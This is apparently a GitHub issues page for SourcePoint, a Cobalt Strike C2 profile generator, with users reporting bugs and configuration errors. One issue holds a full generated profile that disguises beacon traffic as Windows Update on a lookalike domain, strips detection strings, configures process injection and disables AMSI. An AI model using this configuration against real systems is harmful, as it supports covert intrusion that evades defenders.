sourcepoint's People

Contributors

hsfetty, lazzslayer, nahid5, tylous, xenov-x


sourcepoint's Issues

http-get.client.metadata error

Hello, I am getting an http-get.client.metadata error.

Invalid session id
[-] A Malleable C2 attempt to recover data from a '.http-get.client.metadata' transaction failed. This could be due to a bug in the profile, a change made to the profile after this Beacon was run, or a change made to the transaction by some device between your target and your Cobalt Strike controller. The following information will (hopefully) help narrow down what happened.

Error

From '15.158.36.55'
URI '/safebrowsing/8ijb3/793g0INlUAzvUkU'

Headers

'REMOTE_ADDRESS' = '/xx.xx.xx.xx'
'Accept' = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*l;q=0.8'
'CloudFront-Viewer-Country' = 'XX'
'CloudFront-Is-Tablet-Viewer' = 'false'
'CloudFront-Forwarded-Proto' = 'https'
'User-Agent' = 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.10; rv:75.0) Gecko/20100101 Firefox/75.0'
'Connection' = 'Keep-Alive'
'Referer' = 'http://www.google.test'
'CloudFront-Is-Mobile-Viewer' = 'false'
'CloudFront-Is-SmartTV-Viewer' = 'false'
'Host' = 'd2mhkyo3wllxj8.cloudfront.net'
'Pragma' = 'no-cache'
'Via' = '1.1 xx.cloudfront.net (CloudFront)'
'Cache-Control' = 'no-cache'
'X-Amz-Cf-Id' = 'rQYhM_G34ARassaddsasdsadssadasadsddasdsadssadgK6lISasHqmV9xVCxxasxQ=='
'X-Forwarded-For' = 'x.x.x.x'
'CloudFront-Viewer-ASN' = '4657'
'CloudFront-Is-Desktop-Viewer' = 'true'

This is my command to generate the sourcepoint profile
./SourcePoint -Outfile test2.profile -Host xxx.cloudfront.net -Injector NtMapViewOfSection -Profile 5 -Password abcd! -Keystore a123.abc.cf.store

Does anyone have experience troubleshooting this? I have been trying to troubleshoot it, but to no avail ):

Thanks in advance!

Staging Disabled In Profile

This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.

Generating Profile:

┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
└─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

       _____                            ____        _       __ 
      / ___/____  __  _______________  / __ \____  (_)___  / /_
      \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
     ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
    /____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
                                                    (@Tyl0us)

[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[*] Post-Ex Process Name: gpupdate.exe
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking

Starting CS says

┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
└─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[*] Will use existing X509 certificate and keystore (for SSL)
[+] I see you're into threat replication. ./teststage2.profile loaded.
[*] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
[!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
[!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
[+] Team server is up on 0.0.0.0:50050
[*] SHA256 hash of SSL cert is:

Output from teststage2.profile

set host_stage "True";
set sleeptime "44000";
set jitter "20";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";

set data_jitter "50";
set smb_frame_header "";
set pipename "plugplay+3850";
set pipename_stager "plugplay+1395";

set tcp_frame_header "";
set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
set ssh_pipename "plugplay+##";

####Manaully add these if your doing C2 over DNS (Future Release)####
##dns-beacon {

set dns_idle "1.2.3.4";

set dns_max_txt "199";

set dns_sleep "1";

set dns_ttl "5";

set maxdns "200";

set dns_stager_prepend "doc-stg-prepend";

set dns_stager_subhost "doc-stg-sh.";

set beacon "doc.bc.";

set get_A "doc.1a.";

set get_AAAA "doc.4a.";

set get_TXT "doc.tx.";

set put_metadata "doc.md.";

set put_output "doc.po.";

set ns_response "zero";

#}

stage {
set obfuscate "true";
set stomppe "true";
set cleanup "true";
set userwx "false";
set smartinject "true";

#TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
#They will also obfuscate themselves while they wait to read information from their parent Beacon.
set sleep_mask "true";

set checksum "0";
set compile_time "05 Jun 2028 09:16:06";
set entry_point "229200";
set image_size_x86 "397312";
set image_size_x64 "397312";
set name "Windows.System.Diagnostics.dll";
set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";

transform-x86 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";

	}

transform-x64 {
	prepend "\x90\x90\x90"; # NOP, NOP!
	strrep "ReflectiveLoader" "";
	strrep "This program cannot be run in DOS mode" "";
	strrep "beacon.x64.dll" "";
	strrep "NtQueueApcThread" "";
	strrep "IsWow64Process" "";
	strrep "HTTP/1.1 200 OK" "";
	strrep "Stack memory was corrupted" "";
	strrep "kernel32" "";
	strrep "beacon.dll" "";
	strrep "KERNEL32.dll" "";
	strrep "ADVAPI32.dll" "";
	strrep "WININET.dll" "";
	strrep "WS2_32.dll" "";
	strrep "DNSAPI.dll" "";
	strrep "Secur32.dll" "";
	strrep "VirtualProtectEx" "";
	strrep "VirtualProtect" "";
	strrep "VirtualAllocEx" "";
	strrep "VirtualAlloc" "";
	strrep "VirtualFree" "";
	strrep "VirtualQuery" "";
	strrep "RtlVirtualUnwind" "";
	strrep "sAlloc" "";
	strrep "FlsFree" "";
	strrep "FlsGetValue" "";
	strrep "FlsSetValue" "";
	strrep "InitializeCriticalSectionEx" "";
	strrep "CreateSemaphoreExW" "";
	strrep "SetThreadStackGuarantee" "";
	strrep "CreateThreadpoolTimer" "";
	strrep "SetThreadpoolTimer" "";
	strrep "WaitForThreadpoolTimerCallbacks" "";
	strrep "CloseThreadpoolTimer" "";
	strrep "CreateThreadpoolWait" "";
	strrep "SetThreadpoolWait" "";
	strrep "CloseThreadpoolWait" "";
	strrep "FlushProcessWriteBuffers" "";
	strrep "FreeLibraryWhenCallbackReturns" "";
	strrep "GetCurrentProcessorNumber" "";
	strrep "GetLogicalProcessorInformation" "";
	strrep "CreateSymbolicLinkW" "";
	strrep "SetDefaultDllDirectories" "";
	strrep "EnumSystemLocalesEx" "";
	strrep "CompareStringEx" "";
	strrep "GetDateFormatEx" "";
	strrep "GetLocaleInfoEx" "";
	strrep "GetTimeFormatEx" "";
	strrep "GetUserDefaultLocaleName" "";
	strrep "IsValidLocaleName" "";
	strrep "LCMapStringEx" "";
	strrep "GetCurrentPackageId" "";
	strrep "UNICODE" "";
	strrep "UTF-8" "";
	strrep "UTF-16LE" "";
	strrep "MessageBoxW" "";
	strrep "GetActiveWindow" "";
	strrep "GetLastActivePopup" "";
	strrep "GetUserObjectInformationW" "";
	strrep "GetProcessWindowStation" "";
	strrep "Sunday" "";
	strrep "Monday" "";
	strrep "Tuesday" "";
	strrep "Wednesday" "";
	strrep "Thursday" "";
	strrep "Friday" "";
	strrep "Saturday" "";
	strrep "January" "";
	strrep "February" "";
	strrep "March" "";
	strrep "April" "";
	strrep "June" "";
	strrep "July" "";
	strrep "August" "";
	strrep "September" "";
	strrep "October" "";
	strrep "November" "";
	strrep "December" "";
	strrep "MM/dd/yy" "";
	strrep "Stack memory around _alloca was corrupted" "";
	strrep "Unknown Runtime Check Error" "";
	strrep "Unknown Filename" "";
	strrep "Unknown Module Name" "";
	strrep "Run-Time Check Failure #%d - %s" "";
	strrep "Stack corrupted near unknown variable" "";
	strrep "Stack pointer corruption" "";
	strrep "Cast to smaller type causing loss of data" "";
	strrep "Stack memory corruption" "";
	strrep "Local variable used before initialization" "";
	strrep "Stack around _alloca corrupted" "";
	strrep "RegOpenKeyExW" "";
	strrep "egQueryValueExW" "";
	strrep "RegCloseKey" "";
	strrep "LibTomMath" "";
	strrep "Wow64DisableWow64FsRedirection" "";
	strrep "Wow64RevertWow64FsRedirection" "";
	strrep "Kerberos" "";
	}

}

process-inject {
# set remote memory allocation technique
set allocator "NtMapViewOfSection";

# shape the content and properties of what we will inject
set min_alloc "9457";
set userwx    "false";
set startrwx "true";

transform-x86 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

transform-x64 {
    prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
}

# specify how we execute code in the remote process
execute {
	CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
    NtQueueApcThread-s;
    SetThreadContext;
    CreateRemoteThread;
	CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
    RtlCreateUserThread;
}

}

post-ex {
# control the temporary process we spawn to

set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
set spawnto_x64 "%windir%\sysnative\gpupdate.exe";

# change the permissions and content of our post-ex DLLs
set obfuscate "true";

# pass key function pointers from Beacon to its child jobs
set smartinject "true";

# disable AMSI in powerpick, execute-assembly, and psinject
set amsi_disable "true";

# control the method used to log keystrokes 
set keylogger "SetWindowsHookEx";

}

http-get {
set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";

client {

header "Accept" "*/*";
header "Host" "0012eb.lwindowsupdate.com";

metadata {
	base64url;
	append ".cab";
	uri-append;
}

}

server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";

output {

	print;
}

}
}

http-post {
set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";

set verb "GET";

client {

header "Accept" "*/*";


id {
	prepend "download.windowsupdate.com/c/";
	header "Host";
}


output {
	base64url;
	append ".cab";
	uri-append;
}

}

server {
header "Content-Type" "application/vnd.ms-cab-compressed";
header "Server" "Microsoft-IIS/8.5";
header "MSRegion" "N. America";
header "Connection" "keep-alive";
header "X-Powered-By" "ASP.NET";

output {
	print;
}

}
}

http-stager {
server {
header "Content-Type" "application/vnd.ms-cab-compressed";
}
}

https-certificate {
set CN "0012eb.lwindowsupdate.com"; #Common Name
set O "Microsoft Corporation"; #Organization Name
set C "US"; #Country
set L "Redmond"; #Locality
set OU "Microsoft IT"; #Organizational Unit Name
set ST "WA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}

Unknown string replace option kills powershell-import

One of the string replace options kills the functionality of powershell-import.

Prior to running powershell-import, powerpick works fine. After importing Powerview, powerpick shows this error on any command (notice the simple whoami, it doesn't recognize any imported commands at all):

image

I deleted all of the strrep lines in both x86 and x64 and both powershell-import and powerpick worked as intended.

Before I split the strreps into chunks to find the bad one (or couple), any ideas?

[Bug] When specifying self-signed cert, does not write the correct header for "https-certificate"

Everything works great, I love this tool. The only issue is that when you don't specify a keystore for the certificate, the header for the section of "https-certificate" isn't written to the final profile.

The following command:
SourcePoint -Injector VirtualAllocEx -Jitter 21 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 17 -Outfile deez.profile -Host www.bing.com -Profile 2

Results in the following last 20 lines of the profile

$ tail -20 deez.profile

header "Cache-Control" "private, no-cache, no-store, must-revalidate";
header "X-Frame-Options" "SAMEORIGIN";
header "Vary" "Accept-Encoding";
header "X-Via" "haproxy-www-suhx";

}


}


set CN       "www.bing.com"; #Common Name
set O        "Slack Technologies Inc"; #Organization Name
set C        "US"; #Country
set L        "San Francisco"; #Locality
set OU       "DigiCert Inc"; #Organizational Unit Name
set ST       "CA"; #State or Province
set validity "365"; #Number of days the cert is valid for
}

Note: right above set CN there is no https-certificate { as there should be.

escape characters in the magic_mz_x64

When I generate a new profile, it uses the escape character '\' for magic_mz_x64, which causes c2lint errors.
I can regenerate or change it manually and it works fine, no big deal.

error:

[-] Error(s) while compiling /opt/my.profile
Error: unknown escape \A at line 58
       A\AT
         ^
[-] exiting because of errors in /opt/my.profile. Use ./c2lint to check the file

string in my profile:

set magic_mz_x64 "A\AT";

maybe Bug when creating the http.get and http.post URI

The project (when I used it) creates a valid C2 profile, except that the http.get and http.post sections forget a '/' char in the uri and add a space at the end (which is not a bug, just odd).

for example:

Example Currently being generated by profile:
uri "sdfghjk "

Example of what I did to fix it on the test generated profile:
uri "/sdfghjk"

This causes Beacon to never check in properly with the coded HTTP C2 method for the profile I generated. This can be observed in the web log.

Add HTTP Config Option (Feature Request)

Awesome project! Do you think you could add an additional option to set trust_x_forwarded_for in the http-config block for when using HTTP redirectors?

http-config{
    set trust_x_forwarded_for "true";
}

Cannot run with -PE_Clone 30

🐛 Summary

There are 30 options for the PE_Clone, the last one being umppc.dll. When trying to specify #30, an error is thrown. This error comes from Loader.go

To reproduce

  1. Run SourcePoint with the parameter -PE_Clone 30

Any helpful log output or screenshots

[*] Preparing Varibles...
2022/07/08 15:49:17 Error: Please provide a valid PE number less the 31 option

Add any screenshots of the problem here.
image

Indexing error when setting PE_Name variable

🐛 Summary

Line 93 of Loader/Loader.go uses PE[5] to reference the 5th element from the Beacon_Stage_p2 that is generated. 2/30 of the options in Struct/Struct.go do not have the image_size variables, so this line will reference the incorrect variable 1/15 times, or when specifying CyMemDef64.dll (27) or umppc.dll (30) as PE_Clone. The actual error is thrown on line 94 of Loader/Loader.go when printing the name after splitting by ".

To reproduce

  1. This error can be reproduced by running the code with -PE_Clone 27 or -PE_Clone 30

Any helpful log output or screenshots

[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
        /tools/SourcePoint/Loader/Loader.go:94 +0x993
main.main()
        /tools/SourcePoint/SourcePoint.go:252 +0xd11

Below is a screenshot of the error that is thrown:

image

profile

Can we see the profile you use? :D

Thank you

c2lint error to check

Does anyone encounter this problem? My CS version is 4.5

[-] Error(s) while compiling /root/Downloads/edu.profile
Error: invalid option for at line 8
tasks_max_size
Error: invalid option for at line 9
tasks_proxy_max_size
Error: invalid option for at line 10
tasks_dns_proxy_max_size
[-] Unable to load the Beacon profile
/root/Downloads/edu.profile

Windows 10 Defender

I use these 2 commands:

./SourcePoint -Injector NtMapViewOfSection -Host {SECRET.IP} -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

[*] Preparing Varibles...
[!] Self Signed SSL Cerificate Used
[*] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[*] Beacon DLL Spoofed To: srvcli.dll
[*] Post-Ex Process Name: mcbuilder.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking

./SourcePoint -Outfile out.profile -Host {SECRET.IP} -Injector NtMapViewOfSection
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[*] Beacon DLL Spoofed To: GPSVC.dll
[*] Post-Ex Process Name: pcaui.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile:
[+] Profile Generated: strannik2.profile
[+] Happy Hacking

  • Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
    Is this normal?

And the exe is detected.

error when generating profile

Hi,
great project!
When I generate a profile, I sometimes get errors and other times the profile is generated successfully:

installing SourcePoint:

    git clone https://github.com/Tylous/SourcePoint
    cd SourcePoint
    go get gopkg.in/yaml.v2
    go build SourcePoint.go

golang

sudo snap install go --classic
go version go1.21.4 linux/amd64

creating profile

root@c2:/opt# cat /opt/sourcepoint.yml
Outfile: "random.profile"
Host: "fixme.cloudfront.net"
Stage: False
Injector: "VirtualAllocEx"
Forwarder: True
Useragent: "Win10"
Syscall: "Direct"


generating profile - 2 attempts failed and successful 3rd 

cd /opt
SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[*] Preparing Varibles...
panic: runtime error: index out of range [44] with length 36

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Utils.GenerateSingleValue(0x2)
/opt/SourcePoint/Utils/Utils.go:94 +0x8b
github.com/Tylous/SourcePoint/Loader.GeneratePE({0x0, 0x0}, {0x0, 0x0})
/opt/SourcePoint/Loader/Loader.go:350 +0x30f
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
/opt/SourcePoint/Loader/Loader.go:86 +0x3eb
main.main()
/opt/SourcePoint/SourcePoint.go:269 +0xdd3

root@c2:/opt# SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[*] Preparing Varibles...
panic: runtime error: index out of range [41] with length 36

goroutine 1 [running]:
github.com/Tylous/SourcePoint/Utils.GenerateSingleValue(0x2)
/opt/SourcePoint/Utils/Utils.go:94 +0x8b
github.com/Tylous/SourcePoint/Loader.GeneratePE({0x0, 0x0}, {0x0, 0x0})
/opt/SourcePoint/Loader/Loader.go:350 +0x30f
github.com/Tylous/SourcePoint/Loader.GenerateOptions({_, _}, {_, _}, {_, _}, {_, _}, {0x0, 0x0}, ...)
/opt/SourcePoint/Loader/Loader.go:86 +0x3eb
main.main()
/opt/SourcePoint/SourcePoint.go:269 +0xdd3

root@c2:/opt# SourcePoint/SourcePoint -Yaml /opt/sourcepoint.yml

   _____                            ____        _       __ 
  / ___/____  __  _______________  / __ \____  (_)___  / /_
  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
						(@Tyl0us)

[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[*] Beacon DLL Spoofed To: BingMaps.dll
[*] Post-Ex Process Name: dtdump.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] syscall method selected
[*] Seleted Profile:
[+] Profile Generated: random.profile
[+] Happy Hacking
